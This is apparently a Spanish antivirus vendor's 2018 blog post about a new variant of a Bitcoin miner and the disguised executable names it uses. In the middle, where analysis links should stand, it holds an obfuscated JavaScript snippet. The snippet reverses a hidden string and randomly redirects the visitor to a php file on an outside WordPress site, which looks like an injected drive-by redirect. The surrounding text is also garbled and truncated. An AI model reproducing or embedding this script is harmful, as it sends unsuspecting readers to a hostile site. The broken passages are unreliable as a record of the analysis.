NUEVA VARIANTE DE RISKTOOL BITCOINMINER.DP QUE USA VARIOS FICHEROS EN SU PROCESO

Una nueva variante de este minero utiliza varios ficheros que usa en su proceso, empezando por un HeIper.exe y siguiendo por un ByHunter.exe y por otros de nombre parecido (pero con mas o menos “s” en dicho nombre, SVSSHOST.EXE y SVSSSHOST-EXE)

Los preanalisis de dichos ficheros son los siguientes:

to al HeIper.exe:

to al BYHUNTER.EXE:

Y para los otros dos, de nombre parecido, los informes son:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/9743b3fc065a5f62909bdc0bcc970e0b847250814c8ffdfb95028d3688a37277/analysis/1532504789/” target=”_blank” rel=”noopener”>y sobre el otro, SVSSSHOST.EXE:

Ya controlamos otro parecido a este, pero con diferencias en el contenido de los ficheros y su ubicación, por lo que cabe considerarlo uns “mejora” del hacker creador del mismo.

A todos ellos los pasamos a controlar a partir del ELISTARA 39.55 de hoy

Lamentablemente, de estos mineros aparecerán nuevas variantes, pues el robo de las criptomonedas está de mda (BitCoin y similares)

Mucho cuidado con ellos, que tanto por su codicia como por su novedosa técnica, son de continuo y dificil control.

saludos

ms, 25.7.2018